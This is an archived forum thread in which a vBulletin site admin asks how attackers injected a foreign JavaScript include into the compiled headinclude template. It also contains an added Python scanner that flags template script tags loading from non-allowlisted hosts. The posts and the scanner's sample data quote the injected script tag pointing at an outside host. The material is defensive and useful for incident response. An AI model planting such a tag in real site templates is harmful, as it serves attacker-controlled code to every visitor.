vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   How to use external.php to inject a call to a JavaScript? (https://vborg.vbsupport.ru/showthread.php?t=283962)

Spinball 06-05-2012 07:33 AM

How to use external.php to inject a call to a JavaScript?
 
We were hacked last night. Somehow they used external.php called in the headinclude template to include a Chinese .js:

HTML Code:

<link rel="alternate" type="application/rss+xml" title="AVForums.com RSS Feed" href="http://www.avforums.com/forums/external.php?type=RSS2" /> <script type="text/javascript" src="http://www.veggiezjuly.org/eos.js?sscoo"></script><script type="text/javascript" src="http://www.avforums.com/forums/clientscript/ame.js" >
I closed the site, edited headinclude to remove the external.php reference to check that it was the cause. It was. Then I re-added the line but the chinese js code did not reappear.

Does anyone have any idea how they did this?
There was no change to the plugins, files, access via the control panel or anything else suspicious which we could spot.

--------------- Added later (Unix timestamp 1338890536) ---------------

OK, it seems they edited the template table, inserting a link to their js into the compiled headinclude template.

kh99 06-05-2012 09:05 AM

It looks like this is the part that includes an external js file:

Code:

<script type="text/javascript" src="http://www.veggiezjuly.org/eos.js?sscoo">
I think it just happened to be after the <link> to your external.php (RSS feed), so it doesn't really have anything to do with external.php. But there's still the question of how someone was able to insert that - you must still have some vulnerability somewhere.
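
The thread above ends with two findings: the injected element is the `<script src="http://www.veggiezjuly.org/eos.js?sscoo">` tag, not the external.php link next to it, and it was planted in the compiled headinclude row of the template table. A defender checking for this kind of tampering can scan every stored template for `<script>` tags that load code from a host outside the site's own. The following Python is an added example, not code from the thread or from vBulletin; it assumes rows shaped like the `title` and `template` columns of the vBulletin `template` table (how you export them, e.g. with a SQL client, is up to you), and the allowlist host `www.avforums.com` is taken from the snippet posted above. The sample rows are constructed; the headinclude row mirrors the tag reported in the thread.

```python
"""Scan compiled vBulletin templates for <script src=...> references that point
at hosts outside an allowlist.  Added example, not vBulletin's own code."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag in a template."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value.strip())


def script_host(src):
    """Return the lowercase host a script src names, or None for a relative URL."""
    if src.startswith("//"):
        src = "http:" + src  # protocol-relative URLs still name a remote host
    parsed = urlparse(src)
    return parsed.hostname.lower() if parsed.hostname else None


def find_foreign_scripts(template_html, allowed_hosts):
    """Return (host, src) pairs for scripts loaded from hosts not in allowed_hosts.

    Relative paths (e.g. clientscript/vbulletin_menu.js) are served by the site
    itself and are not flagged; only absolute or protocol-relative URLs are checked.
    """
    allowed = {h.lower() for h in allowed_hosts}
    collector = ScriptSrcCollector()
    collector.feed(template_html)
    collector.close()
    flagged = []
    for src in collector.sources:
        host = script_host(src)
        if host is not None and host not in allowed:
            flagged.append((host, src))
    return flagged


def scan_templates(rows, allowed_hosts):
    """rows: iterable of (title, compiled_template) as in the vBulletin template table.

    Returns {template_title: [(host, src), ...]} for templates with foreign scripts.
    """
    report = {}
    for title, html in rows:
        hits = find_foreign_scripts(html, allowed_hosts)
        if hits:
            report[title] = hits
    return report


# Constructed sample rows; the headinclude row mirrors the tag reported in the thread.
SAMPLE_ROWS = [
    ("headinclude",
     '<link rel="alternate" type="application/rss+xml" title="AVForums.com RSS Feed" '
     'href="http://www.avforums.com/forums/external.php?type=RSS2" />'
     '<script type="text/javascript" src="http://www.veggiezjuly.org/eos.js?sscoo"></script>'
     '<script type="text/javascript" src="http://www.avforums.com/forums/clientscript/ame.js"></script>'),
    ("footer",
     '<script type="text/javascript" src="clientscript/vbulletin_menu.js"></script>'),
    ("header",
     '<script type="text/javascript" src="//www.avforums.com/forums/clientscript/vbulletin_global.js"></script>'),
]

# Assumed allowlist: the forum's own host, taken from the snippet in the thread.
ALLOWED_HOSTS = ["www.avforums.com"]

if __name__ == "__main__":
    for title, hits in scan_templates(SAMPLE_ROWS, ALLOWED_HOSTS).items():
        for host, src in hits:
            print(f"{title}: script loaded from non-allowlisted host {host}: {src}")
```

Run against a full export of the template table, this flags only the headinclude row in the sample, because the other rows load scripts either by relative path or from the allowlisted host. Re-running it after a cleanup gives a quick check that no other template was modified in the same way.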

Spinball 06-05-2012 09:45 AM

Agreed. I've set my host on to the task of finding where. Thanks.


All times are GMT. The time now is 08:00 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
